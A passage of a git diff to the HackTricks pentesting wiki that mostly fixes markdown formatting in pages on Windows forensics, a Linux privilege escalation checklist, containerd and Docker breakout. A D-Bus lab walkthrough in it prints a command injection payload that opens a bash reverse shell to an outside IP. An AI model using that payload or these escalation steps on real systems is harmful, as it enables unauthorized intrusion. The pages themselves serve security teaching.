 * 20001 / 20003 / 10000: First time it was used
-* 10100: Driver update 
+* 10100: Driver update&#x20;
 
 The EventID 112 from DeviceSetupManager contains the timestamp of each USB device inserted.
 
diff --git a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
index cfc515ff..b4703689 100644
--- a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
+++ b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
@@ -32,7 +32,7 @@
 
 ### Shared Folders
 
-* **`System\ControlSet001\Services\lanmanserver\Shares\`**: Share folders and their configurations. If **Client Side Caching** (CSCFLAGS) is enabled, then, a copy of the shared files will be saved in the clients and server in `C:\Windows\CSC` 
+* **`System\ControlSet001\Services\lanmanserver\Shares\`**: Share folders and their configurations. If **Client Side Caching** (CSCFLAGS) is enabled, then, a copy of the shared files will be saved in the clients and server in `C:\Windows\CSC`&#x20;
   * CSCFlag=0 -> By default the user needs to indicate the files that he wants to cache
   * CSCFlag=16 -> Automatic caching documents. “All files and programs that users open from the shared folder are automatically available offline” with the “optimize for performance" unticked.
   * CSCFlag=32 -> Like the previous options by “optimize for performance”  is ticked
@@ -42,10 +42,10 @@
 
 ### AutoStart programs
 
-* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run` 
-* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce` 
-* `Software\Microsoft\Windows\CurrentVersion\Runonce` 
-* `Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run` 
+* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`&#x20;
+* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce`&#x20;
+* `Software\Microsoft\Windows\CurrentVersion\Runonce`&#x20;
+* `Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run`&#x20;
 * `Software\Microsoft\Windows\CurrentVersion\Run`
 
 ### Explorer Searches
@@ -110,7 +110,7 @@ Desktop Access:
 * `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU`
 * `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags`
 
-To analyze the Shellbags you can use [**Shellbag Explorer**](https://ericzimmerman.github.io/#!index.md) **\*\*and you will be able to find the **MAC time of the folder** and also the **creation date and modified date of the shellbag** which are related with the **first time the folder was accessed and the last time\*\*.
+To analyze the Shellbags you can use [**Shellbag Explorer**](https://ericzimmerman.github.io/#!index.md) **\*\*and you will be able to find the** MAC time of the folder **and also the** creation date and modified date of the shellbag **which are related with the** first time the folder was accessed and the last time\*\*.
 
 Note 2 things from the following image:
 
diff --git a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
index b8a3bbdd..371d97e0 100644
--- a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
+++ b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
@@ -62,7 +62,7 @@ Keep in mind that this process is highly attacked to dump passwords.
 
 This is the **Generic Service Host Process**.\
 It hosts multiple DLL services in one shared process.\
-Usually you will find that **svchost.exe** is launched with `-k` flag. This will launch a query to the registry **HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost **where there will be a key with the argument mentioned in -k that will contain the services to launch in the same process.
+Usually you will find that **svchost.exe** is launched with `-k` flag. This will launch a query to the registry **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** where there will be a key with the argument mentioned in -k that will contain the services to launch in the same process.
 
 For example: `-k UnistackSvcGroup` will launch: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc`
 
@@ -79,7 +79,7 @@ In W8 is called taskhostex.exe and in W10 taskhostw.exe.
 
 This is the process responsible for the **user's desktop** and launching files via file extensions.\
 **Only 1** process should be spawned **per logged on user.**\
-This is run from **userinit.exe** which should be terminated, so **no parent **should appear for this process.
+This is run from **userinit.exe** which should be terminated, so **no parent** should appear for this process.
 
 ## Catching Malicious Processes
 
diff --git a/interesting-http.md b/interesting-http.md
index f1ac97d4..90d7582c 100644
--- a/interesting-http.md
+++ b/interesting-http.md
@@ -10,7 +10,7 @@ If at some point inside a web page any sensitive information is located on a GET
 
 ### Mitigation
 
-You can make the browser follow a **Referrer-policy** that could **avoid **the sensitive information to be sent to other web applications:
+You can make the browser follow a **Referrer-policy** that could **avoid** the sensitive information to be sent to other web applications:
 
 ```
 Referrer-Policy: no-referrer
diff --git a/linux-unix/linux-environment-variables.md b/linux-unix/linux-environment-variables.md
index c35a36b3..5cc0a341 100644
--- a/linux-unix/linux-environment-variables.md
+++ b/linux-unix/linux-environment-variables.md
@@ -60,7 +60,7 @@ cat /proc/`python -c "import os; print(os.getppid())"`/environ
 * _**\~/.bashrc**_\*\* :\*\* This file behaves the same way _/etc/bash.bashrc_ file works but it is executed only for a specific user. If you want to create an environment for yourself go ahead and modify or create this file in your home directory.
 * _**\~/.profile, \~/.bash\_profile, \~/.bash\_login**_**:** These files are same as _/etc/profile_. The difference comes in the way it is executed. This file is executed only when a user in whose home directory this file exists, logs in.
 
-**Extracted from: **[**here**](https://codeburst.io/linux-environment-variables-53cea0245dc9)** and **[**here**](https://www.gnu.org/software/bash/manual/html\_node/Bash-Startup-Files.html)
+**Extracted from:** [**here**](https://codeburst.io/linux-environment-variables-53cea0245dc9) **and** [**here**](https://www.gnu.org/software/bash/manual/html\_node/Bash-Startup-Files.html)
 
 ## Common variables
 
diff --git a/linux-unix/linux-privilege-escalation-checklist.md b/linux-unix/linux-privilege-escalation-checklist.md
index 4e7dc087..bb4ee631 100644
--- a/linux-unix/linux-privilege-escalation-checklist.md
+++ b/linux-unix/linux-privilege-escalation-checklist.md
@@ -6,51 +6,51 @@ description: Checklist for privilege escalation in Linux
 
 {% hint style="danger" %}
 Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**?\
-[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop)** so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
+[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
 {% endhint %}
 
-If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks **or** PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
-If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to** give ⭐** on **github** to **motivate** **me** to continue developing this book.
+If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
+If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
 
-### **Best tool to look for Linux local privilege escalation vectors: **[**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)****
+### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)****
 
 ### [System Information](privilege-escalation/#system-information)
 
-* [ ] Get** OS information**
+* [ ] Get **OS information**
 * [ ] Check the [**PATH**](privilege-escalation/#path), any **writable folder**?
 * [ ] Check [**env variables**](privilege-escalation/#env-info), any sensitive detail?
-* [ ] Search for [**kernel exploits**](privilege-escalation/#kernel-exploits)** using scripts **(DirtyCow?)
-* [ ] **Check **if the [**sudo version **is vulnerable](privilege-escalation/#sudo-version)
+* [ ] Search for [**kernel exploits**](privilege-escalation/#kernel-exploits) **using scripts** (DirtyCow?)
+* [ ] **Check** if the [**sudo version** is vulnerable](privilege-escalation/#sudo-version)
 * [ ] ****[**Dmesg** signature verification failed](privilege-escalation/#dmesg-signature-verification-failed) error?
 * [ ] More system enum ([date, system stats, cpu info, printers](privilege-escalation/#more-system-enumeration))
 * [ ] [Enumerate more defenses](privilege-escalation/#enumerate-possible-defenses)
 
 ### [Drives](privilege-escalation/#drives)
 
-* [ ] **List mounted **drives
+* [ ] **List mounted** drives
 * [ ] **Any unmounted drive?**
 * [ ] **Any creds in fstab?**
 
 ### ****[**Installed Software**](privilege-escalation/#installed-software)****
 
-* [ ] **Check for**[** useful software**](privilege-escalation/#useful-software)** installed**
-* [ ] **Check for **[**vulnerable software**](privilege-escalation/#vulnerable-software-installed)** installed**
+* [ ] **Check for**[ **useful software**](privilege-escalation/#useful-software) **installed**
+* [ ] **Check for** [**vulnerable software**](privilege-escalation/#vulnerable-software-installed) **installed**
 
 ### ****[Processes](privilege-escalation/#processes)
 
 * [ ] Is  any **unknown software running**?
 * [ ] Is any software with **more privileges that it should have running**?
-* [ ] Search for** exploits for running processes** (specially if running of versions)
+* [ ] Search for **exploits for running processes** (specially if running of versions)
 * [ ] Can you **modify the binary** of any running process?
 * [ ] **Monitor processes** and check if any interesting process is running frequently
-* [ ] Can you **read **some interesting **process memory **(where passwords could be saved)?
+* [ ] Can you **read** some interesting **process memory** (where passwords could be saved)?
 
 ### [Scheduled/Cron jobs?](privilege-escalation/#scheduled-jobs)
 
-* [ ] Is the [**PATH **](privilege-escalation/#cron-path)being modified by some cron and you can **write **in it?
-* [ ] Any [**wildcard **](privilege-escalation/#cron-using-a-script-with-a-wildcard-wildcard-injection)in a cron job?
-* [ ] Some [**modifiable script** ](privilege-escalation/#cron-script-overwriting-and-symlink)is being **executed **or is inside **modifiable folder**?
-* [ ] Have you detected that some **script **could be being [**executed **very **frequently**](privilege-escalation/#frequent-cron-jobs)? (every 1, 2 or 5 minutes)
+* [ ] Is the [**PATH** ](privilege-escalation/#cron-path)being modified by some cron and you can **write** in it?
+* [ ] Any [**wildcard** ](privilege-escalation/#cron-using-a-script-with-a-wildcard-wildcard-injection)in a cron job?
+* [ ] Some [**modifiable script** ](privilege-escalation/#cron-script-overwriting-and-symlink)is being **executed** or is inside **modifiable folder**?
+* [ ] Have you detected that some **script** could be being [**executed** very **frequently**](privilege-escalation/#frequent-cron-jobs)? (every 1, 2 or 5 minutes)
 
 ### [Services](privilege-escalation/#services)
 
@@ -64,7 +64,7 @@ If you want to **share some tricks with the community** you can also submit **pu
 
 ### [Sockets](privilege-escalation/#sockets)
 
-* [ ] Any** writable .socket **file?
+* [ ] Any **writable .socket** file?
 * [ ] Can you **communicate with any socket**?
 * [ ] **HTTP sockets** with interesting info?
 
@@ -83,27 +83,27 @@ If you want to **share some tricks with the community** you can also submit **pu
 * [ ] Generic users/groups **enumeration**
 * [ ] Do you have a **very big UID**? Is the **machine** **vulnerable**?
 * [ ] Can you [**escalate privileges thanks to a group**](privilege-escalation/interesting-groups-linux-pe/) you belong to?
-* [ ] **Clipboard **data?
+* [ ] **Clipboard** data?
 * [ ] Password Policy?
-* [ ] Try to **use **every **known password **that you have discovered previously to login **with each **possible **user**. Try to login also without password.
+* [ ] Try to **use** every **known password** that you have discovered previously to login **with each** possible **user**. Try to login also without password.
 
 ### [Writable PATH](privilege-escalation/#writable-path-abuses)
 
-* [ ] If you have** write privileges over some folder in PATH** you may be able to escalate privileges
+* [ ] If you have **write privileges over some folder in PATH** you may be able to escalate privileges
 
 ### [SUDO and SUID commands](privilege-escalation/#sudo-and-suid)
 
 * [ ] Can you execute **any comand with sudo**? Can you use it to READ, WRITE or EXECUTE anything as root? ([**GTFOBins**](https://gtfobins.github.io))
 * [ ] Is any **exploitable suid binary**? ([**GTFOBins**](https://gtfobins.github.io))
-* [ ] Are [**sudo **commands **limited **by **path**? can you **bypass **the restrictions](privilege-escalation/#sudo-execution-bypassing-paths)?
+* [ ] Are [**sudo** commands **limited** by **path**? can you **bypass** the restrictions](privilege-escalation/#sudo-execution-bypassing-paths)?
 * [ ] ****[**Sudo/SUID binary without path indicated**](privilege-escalation/#sudo-command-suid-binary-without-command-path)?
 * [ ] ****[**SUID binary specifying path**](privilege-escalation/#suid-binary-with-command-path)? Bypass
-* [ ] ****[**LD_PRELOAD vuln**](privilege-escalation/#ld_preload)****
-* [ ] ****[**Lack of .so library in SUID binary**](privilege-escalation/#suid-binary-so-injection)** **from a writable folder?
+* [ ] ****[**LD\_PRELOAD vuln**](privilege-escalation/#ld\_preload)****
+* [ ] ****[**Lack of .so library in SUID binary**](privilege-escalation/#suid-binary-so-injection) **** from a writable folder?
 * [ ] ****[**SUDO tokens available**](privilege-escalation/#reusing-sudo-tokens)? [**Can you create a SUDO token**](privilege-escalation/#var-run-sudo-ts-less-than-username-greater-than)?
 * [ ] Can you [**read or modify sudoers files**](privilege-escalation/#etc-sudoers-etc-sudoers-d)?
 * [ ] Can you [**modify /etc/ld.so.conf.d/**](privilege-escalation/#etc-ld-so-conf-d)?
-* [ ] [**OpenBSD DOAS**](privilege-escalation/#doas)** **command
+* [ ] [**OpenBSD DOAS**](privilege-escalation/#doas) **** command
 
 ### [Capabilities](privilege-escalation/#capabilities)
 
@@ -120,7 +120,7 @@ If you want to **share some tricks with the community** you can also submit **pu
 
 ### [SSH](privilege-escalation/#ssh)
 
-* [ ] **Debian **[**OpenSSL Predictable PRNG - CVE-2008-0166**](privilege-escalation/#debian-openssl-predictable-prng-cve-2008-0166)****
+* [ ] **Debian** [**OpenSSL Predictable PRNG - CVE-2008-0166**](privilege-escalation/#debian-openssl-predictable-prng-cve-2008-0166)****
 * [ ] ****[**SSH Interesting configuration values**](privilege-escalation/#ssh-interesting-configuration-values)****
 
 ### [Interesting Files](privilege-escalation/#interesting-files)
@@ -128,20 +128,20 @@ If you want to **share some tricks with the community** you can also submit **pu
 * [ ] **Profile files** - Read sensitive data? Write to privesc?
 * [ ] **passwd/shadow files** - Read sensitive data? Write to privesc?
 * [ ] **Check commonly interesting folders** for sensitive data
-* [ ] **Weird Localtion/Owned files, **you may have access or alter executable files
-* [ ] **Modified **in last mins
+* [ ] **Weird Localtion/Owned files,** you may have access or alter executable files
+* [ ] **Modified** in last mins
 * [ ] **Sqlite DB files**
 * [ ] **Hidden files**
 * [ ] **Script/Binaries in PATH**
-* [ ] **Web files **(passwords?)
+* [ ] **Web files** (passwords?)
 * [ ] **Backups**?
-* [ ] **Known files that contains passwords**: Use **Linpeas **and **LaZagne**
+* [ ] **Known files that contains passwords**: Use **Linpeas** and **LaZagne**
 * [ ] **Generic search**
 
 ### ****[**Writable Files**](privilege-escalation/#writable-files)****
 
 * [ ] **Modify python library** to execute arbitrary commands?
-* [ ] Can you **modify log files**? **Logtotten **exploit
+* [ ] Can you **modify log files**? **Logtotten** exploit
 * [ ] Can you **modify /etc/sysconfig/network-scripts/**? Centos/Redhat exploit
 * [ ] Can you [**write in ini, int.d, systemd or rc.d files**](privilege-escalation/#init-init-d-systemd-and-rc-d)?
 
@@ -150,8 +150,8 @@ If you want to **share some tricks with the community** you can also submit **pu
 * [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
 * [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
 
-If you want to **know **about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**,** **join the [💬](https://emojipedia.org/speech-balloon/)** **[**PEASS & HackTricks telegram group here**](https://t.me/peass), or** follow me on Twitter **[🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
-****If you want to** share some tricks with the community **you can also submit **pull requests **to** **[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks)** **that will be reflected in this book.\
+If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **** join the [💬](https://emojipedia.org/speech-balloon/) **** [**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
+****If you want to **share some tricks with the community** you can also submit **pull requests** to **** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) **** that will be reflected in this book.\
 Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
 
 ![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (3).png>)
diff --git a/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md b/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md
index 4a42db52..67b2b942 100644
--- a/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md
+++ b/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md
@@ -2,7 +2,7 @@
 
 ## Basic information
 
-Go to the following link to learn **what is containerd **and `ctr`:
+Go to the following link to learn **what is containerd** and `ctr`:
 
 {% content-ref url="../../pentesting/2375-pentesting-docker.md" %}
 [2375-pentesting-docker.md](../../pentesting/2375-pentesting-docker.md)
@@ -41,7 +41,7 @@ You can run a privileged container as:
  ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
 ```
 
-Then you can use some of the techniques mentioned in the following page to** escape from it abusing privileged capabilities**:
+Then you can use some of the techniques mentioned in the following page to **escape from it abusing privileged capabilities**:
 
 {% content-ref url="docker-breakout/" %}
 [docker-breakout](docker-breakout/)
diff --git a/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md b/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md
index e3ec9896..47134389 100644
--- a/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md
+++ b/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md
@@ -2,11 +2,11 @@
 
 ## **GUI enumeration**
 
-**(This enumeration info was taken from **[**https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/**](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/)**)**
+**(This enumeration info was taken from** [**https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/**](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/)**)**
 
 Ubuntu desktop utilizes D-Bus as its inter-process communications (IPC) mediator. On Ubuntu, there are several message buses that run concurrently: A system bus, which is mainly used by **privileged services to expose system-wide relevant services**, and one session bus for each logged in user, which exposes services that are only relevant to that specific user. Since we will try to elevate our privileges, we will mainly focus on the system bus as the services there tend to run with higher privileges (i.e. root). Note that the D-Bus architecture utilizes one ‘router’ per session bus, which redirects client messages to the relevant services they are trying to interact with. Clients need to specify the address of the service to which they want to send messages.
 
-Each service is defined by the **objects **and **interfaces** that it exposes. We can think of objects as instances of classes in standard OOP languages. Each unique instance is identified by its **object path** – a string which resembles a file system path that uniquely identifies each object that the service exposes. A standard interface that will help with our research is the **org.freedesktop.DBus.Introspectable** interface. It contains a single method, Introspect, which returns an XML representation of the methods, signals and properties supported by the object. This blog post focuses on methods and ignores properties and signals.
+Each service is defined by the **objects** and **interfaces** that it exposes. We can think of objects as instances of classes in standard OOP languages. Each unique instance is identified by its **object path** – a string which resembles a file system path that uniquely identifies each object that the service exposes. A standard interface that will help with our research is the **org.freedesktop.DBus.Introspectable** interface. It contains a single method, Introspect, which returns an XML representation of the methods, signals and properties supported by the object. This blog post focuses on methods and ignores properties and signals.
 
 I used two tools to communicate with the D-Bus interface: CLI tool named **gdbus**, which allows to easily call D-Bus exposed methods in scripts, and [**D-Feet**](https://wiki.gnome.org/Apps/DFeet), a Python based GUI tool that helps to enumerate the available services on each bus and to see which objects each service contains.
 
@@ -24,7 +24,7 @@ _Figure 2. D-Feet interface window_
 
 On the left pane in Figure 1 you can see all the various services that have registered with the D-Bus daemon system bus (note the select System Bus button on the top). I selected the **org.debin.apt** service, and D-Feet automatically **queried the service for all the available objects**. Once I selected a specific object, the set of all interfaces, with their respective methods properties and signals are listed, as seen in Figure 2. Note that we also get the signature of each **IPC exposed method**.
 
-We can also see the** pid of the process** that hosts each service, as well as its **command line**. This is a very useful feature, since we can validate that the target service we are inspecting indeed runs with higher privileges. Some services on the System bus don’t run as root, and thus are less interesting to research.
+We can also see the **pid of the process** that hosts each service, as well as its **command line**. This is a very useful feature, since we can validate that the target service we are inspecting indeed runs with higher privileges. Some services on the System bus don’t run as root, and thus are less interesting to research.
 
 D-Feet also allows one to call the various methods. In the method input screen we can specify a list of Python expressions, delimited by commas, to be interpreted as the parameters to the invoked function, shown in Figure 3. Python types are marshaled to D-Bus types and passed to the service.
 
@@ -178,10 +178,10 @@ Note the method `.Block` of the interface `htb.oouch.Block` (the one we are inte
 
 With enough privileges (just `send_destination` and `receive_sender` privileges aren't enough) you can **monitor a D-Bus communication**.
 
-In order to **monitor** a **communication** you will need to be **root. **If you still find problems being root check [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) and [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus)
+In order to **monitor** a **communication** you will need to be **root.** If you still find problems being root check [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) and [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus)
 
 {% hint style="warning" %}
-If you know how to configure a D-Bus config file to** allow non root users to sniff **the communication please **contact me**!
+If you know how to configure a D-Bus config file to **allow non root users to sniff** the communication please **contact me**!
 {% endhint %}
 
 Different ways to monitor:
@@ -215,7 +215,7 @@ Monitoring bus message stream.
 
 You can use `capture` instead of `monitor` to save the results in a pcap file.
 
-#### Filtering all the noise <a href="filtering_all_the_noise" id="filtering_all_the_noise"></a>
+#### Filtering all the noise <a href="#filtering_all_the_noise" id="filtering_all_the_noise"></a>
 
 If there is just too much information on the bus, pass a match rule like so:
 
@@ -243,7 +243,7 @@ See the [D-Bus documentation](http://dbus.freedesktop.org/doc/dbus-specification
 
 ## **Vulnerable Scenario**
 
-As user **qtc inside the host "oouch" from HTB **you can find an **unexpected D-Bus config file** located in_ /etc/dbus-1/system.d/htb.oouch.Block.conf_:
+As user **qtc inside the host "oouch" from HTB** you can find an **unexpected D-Bus config file** located in _/etc/dbus-1/system.d/htb.oouch.Block.conf_:
 
 ```markup
 <?xml version="1.0" encoding="UTF-8"?> <!-- -*- XML -*- -->
@@ -266,9 +266,9 @@ As user **qtc inside the host "oouch" from HTB **you can find an **unexpected D-
 </busconfig>
 ```
 
-Note from the previous configuration that** you will need to be the user `root` or `www-data` to send and receive information** via this D-BUS communication.
+Note from the previous configuration that **you will need to be the user `root` or `www-data` to send and receive information** via this D-BUS communication.
 
-As user **qtc **inside the docker container **aeb4525789d8** you can find some dbus related code in the file _/code/oouch/routes.py. _This is the interesting code:
+As user **qtc** inside the docker container **aeb4525789d8** you can find some dbus related code in the file _/code/oouch/routes.py._ This is the interesting code:
 
 ```python
 if primitive_xss.search(form.textfield.data):
@@ -282,14 +282,14 @@ if primitive_xss.search(form.textfield.data):
             return render_template('hacker.html', title='Hacker')
 ```
 
-As you can see, it is **connecting to a D-Bus interface** and sending to the **"Block" function** the "client_ip".
+As you can see, it is **connecting to a D-Bus interface** and sending to the **"Block" function** the "client\_ip".
 
-In the other side of the D-Bus connection there is some C compiled binary running. This code is **listening **in the D-Bus connection **for IP address and is calling iptables via `system` function** to block the given IP address.\
+In the other side of the D-Bus connection there is some C compiled binary running. This code is **listening** in the D-Bus connection **for IP address and is calling iptables via `system` function** to block the given IP address.\
 **The call to `system` is vulnerable on purpose to command injection**, so a payload like the following one will create a reverse shell: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
 
 ### Exploit it
 
-At the end of this page you can find the** complete C code of the D-Bus application**. Inside of it you can find between the lines 91-97 **how the **_**D-Bus object path**_ **and **_**interface name**_** are registered**. This information will be necessary to send information to the D-Bus connection:
+At the end of this page you can find the **complete C code of the D-Bus application**. Inside of it you can find between the lines 91-97 **how the **_**D-Bus object path**_ **and **_**interface name**_** are registered**. This information will be necessary to send information to the D-Bus connection:
 
 ```c
         /* Install the object */
@@ -336,7 +336,7 @@ dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oou
 
 _Note that in `htb.oouch.Block.Block`, the first part (`htb.oouch.Block`) references the service object and the last part (`.Block`) references the method name._
 
-### C code 
+### C code&#x20;
 
 {% code title="d-bus_server.c" %}
 ```c
diff --git a/linux-unix/privilege-escalation/docker-breakout/README.md b/linux-unix/privilege-escalation/docker-breakout/README.md
index 46de3752..67e21d7a 100644
--- a/linux-unix/privilege-escalation/docker-breakout/README.md
+++ b/linux-unix/privilege-escalation/docker-breakout/README.md
@@ -34,11 +34,11 @@ Container images are stored either in private repository or public repository. F
 
 ### Image Scanning
 
-Containers can have** security vulnerabilities **either because of the base image or because of the software installed on top of the base image. Docker is working on a project called **Nautilus** that does security scan of Containers and lists the vulnerabilities. Nautilus works by comparing the each Container image layer with vulnerability repository to identify security holes.
+Containers can have **security vulnerabilities** either because of the base image or because of the software installed on top of the base image. Docker is working on a project called **Nautilus** that does security scan of Containers and lists the vulnerabilities. Nautilus works by comparing the each Container image layer with vulnerability repository to identify security holes.
 
 For more [**information read this**](https://docs.docker.com/engine/scan/).
 
-#### How to scan images <a href="how-to-scan-images" id="how-to-scan-images"></a>
+#### How to scan images <a href="#how-to-scan-images" id="how-to-scan-images"></a>
 
 The `docker scan` command allows you to scan existing Docker images using the image name or ID. For example, run the following command to scan the hello-world image:
 
@@ -137,7 +137,7 @@ ls -l /proc/<PID>/ns #Get the Group and the namespaces (some may be uniq to the
 
 ### Capabilities
 
-Capabilities allow **finer control for the capabilities that can be allowed** for root user. Docker uses the Linux kernel capability feature to** limit the operations that can be done inside a Container** irrespective of the type of user.
+Capabilities allow **finer control for the capabilities that can be allowed** for root user. Docker uses the Linux kernel capability feature to **limit the operations that can be done inside a Container** irrespective of the type of user.
 
 {% content-ref url="../linux-capabilities.md" %}
 [linux-capabilities.md](../linux-capabilities.md)
@@ -238,19 +238,19 @@ If you’re using [Kubernetes](https://kubernetes.io/docs/concepts/configuration
 
 ### Kata Containers
 
-**Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide** stronger workload isolation using hardware virtualization** technology as a second layer of defense.
+**Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide **stronger workload isolation using hardware virtualization** technology as a second layer of defense.
 
 {% embed url="https://katacontainers.io/" %}
 
 ### Summary Tips
 
-* **Do not use the `--privileged` flag or mount a **[**Docker socket inside the container**](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/)**.** The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the `--privileged` flag.
-* Do **not run as root inside the container. Use a **[**different user**](https://docs.docker.com/develop/develop-images/dockerfile\_best-practices/#user)** and **[**user namespaces**](https://docs.docker.com/engine/security/userns-remap/)**.** The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups.
-* [**Drop all capabilities**](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities)** (`--cap-drop=all`) and enable only those that are required** (`--cap-add=...`). Many of workloads don’t need any capabilities and adding them increases the scope of a potential attack.
-* [**Use the “no-new-privileges” security option**](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/)** **to prevent processes from gaining more privileges, for example through suid binaries.
+* **Do not use the `--privileged` flag or mount a** [**Docker socket inside the container**](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/)**.** The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the `--privileged` flag.
+* Do **not run as root inside the container. Use a** [**different user**](https://docs.docker.com/develop/develop-images/dockerfile\_best-practices/#user) **and** [**user namespaces**](https://docs.docker.com/engine/security/userns-remap/)**.** The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups.
+* [**Drop all capabilities**](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) **(`--cap-drop=all`) and enable only those that are required** (`--cap-add=...`). Many of workloads don’t need any capabilities and adding them increases the scope of a potential attack.
+* [**Use the “no-new-privileges” security option**](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) **** to prevent processes from gaining more privileges, for example through suid binaries.
 * ****[**Limit resources available to the container**](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources)**.** Resource limits can protect the machine from denial of service attacks.
-* **Adjust **[**seccomp**](https://docs.docker.com/engine/security/seccomp/)**, **[**AppArmor**](https://docs.docker.com/engine/security/apparmor/)** (or SELinux) **profiles to restrict the actions and syscalls available for the container to the minimum required.
